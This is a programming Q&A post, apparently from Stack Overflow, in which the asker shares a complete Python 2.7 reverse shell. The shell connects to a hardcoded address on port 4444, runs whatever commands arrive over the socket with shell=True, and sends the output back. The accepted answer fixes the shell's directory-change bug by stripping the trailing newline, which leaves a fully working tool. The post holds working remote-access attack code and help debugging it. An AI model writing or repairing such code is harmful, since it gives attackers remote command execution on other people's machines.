# WindowsError: [Error 123] The filename, directory name, or volume label syntax is incorrect

Tags: python-2.7, reverse-shell

I'm making a simple Python 2.7 reverse-shell , for the directory change function everytime I type cd C:\ in my netcat server it throws this error "WindowsError: [Error 123] The filename, directory name, or volume label syntax is incorrect: 'C:\\n'" Here is my code.

```
    import socket
    import os
    import subprocess
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    host = "192.168.1.15"
    port = 4444
    s.connect((host, port))
    s.send(os.getcwd() + '> ')
    def Shell():
        while True:
            data = s.recv(1024)
            if data[:2] == 'cd':
                os.chdir(data[3:])
            if len(data) > 0:
                proc = subprocess.Popen(data, shell = True ,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
                result = proc.stdout.read() + proc.stderr.read()
                s.send(result)
                s.send(os.getcwd() + '> ')
                print(data)
    Shell()
```

Answer (score 0, accepted):

When you use `data = s.recv(1024)` to receive data from remote, the `\n` character, generated when you press <kbd>Enter</kbd> to end current input, will be received at the same time.

So you just need to `.strip()` it, or use `[:-1]` to remove the last character (which is `\n`), when you get data.

```
data = s.recv(1024).strip()
```

or

```
data = s.recv(1024)[:-1]
```

may both OK.